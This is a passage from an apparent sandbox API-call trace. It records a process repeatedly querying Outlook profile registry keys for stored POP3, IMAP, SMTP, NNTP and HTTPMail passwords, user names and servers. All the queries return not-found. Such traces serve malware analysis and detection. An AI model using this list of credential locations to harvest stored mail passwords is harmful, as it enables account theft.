lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.208] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.208] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.208] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.209] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.209] RegCloseKey (hKey=0x95c) returned 0x0 [0249.209] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.210] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.210] RegCloseKey (hKey=0x95c) returned 0x0 [0249.210] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.211] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.211] RegCloseKey (hKey=0x95c) returned 0x0 [0249.211] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.211] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.211] RegCloseKey (hKey=0x95c) returned 0x0 [0249.211] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.211] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.211] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.212] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.212] RegCloseKey (hKey=0x95c) returned 0x0 [0249.212] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.213] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.213] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.213] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.214] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.214] RegCloseKey (hKey=0x95c) returned 0x0 [0249.214] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.215] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.215] RegCloseKey (hKey=0x95c) returned 0x0 [0249.215] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.215] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.215] RegCloseKey (hKey=0x95c) returned 0x0 [0249.215] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.215] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.215] RegCloseKey (hKey=0x95c) returned 0x0 [0249.215] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.215] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.215] RegCloseKey (hKey=0x95c) returned 0x0 [0249.215] LocalFree (hMem=0x5d68100) returned 0x0 [0249.215] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x8, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="9207f3e0a3b11019908b08002b2a56c2", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.215] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.215] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67060 [0249.215] wsprintfA (in: param_1=0x5d67060, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0249.215] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.215] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.215] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 